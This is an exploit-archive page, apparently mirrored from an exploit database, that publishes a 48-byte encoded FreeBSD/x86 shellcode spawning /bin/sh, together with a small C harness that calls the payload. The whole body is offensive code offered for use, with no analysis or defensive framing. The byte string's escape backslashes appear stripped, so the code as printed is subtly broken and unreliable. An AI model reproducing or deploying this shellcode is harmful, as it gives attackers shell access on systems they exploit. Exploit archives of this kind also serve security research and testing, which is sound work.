[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : freebsd/x86 encrypted shellcode /bin/sh 48 bytes
# Published : 2008-08-19
# Author : c0d3_z3r0
# Previous Title : linux/x86 shellcode generator / null free
# Next Title : linux/mips (Linksys WRT54G/GL) port bind shellcode 276 bytes


/*

Encoded SUB shellcode execve /bin/sh of 48 bytes
by anderson_underground@hotmail.com <c0d3_z3r0>

Hack 'n Roll

*/


char shellcode[] =
"x31xd2"
"xebx0e"
"x31xdb"
"x5b"
"xb1x19"
"x83x2cx1ax01"
"x42"
"xe2xf9"
"xebx05"
"xe8xedxffxffxff"
"x32xc1"
"x51"
"x69x30x30x74x69x69"
"x30x63x6a"
"x6f"
"x32xdc"
"x8axe4"
"x51"
"x55"
"x54"
"x51"
"xb1x3c"
"xce"
"x81";


main(){
printf("Length: %dn",strlen(shellcode));
asm("call shellcode");
}

// www.Syue.com [2008-08-19]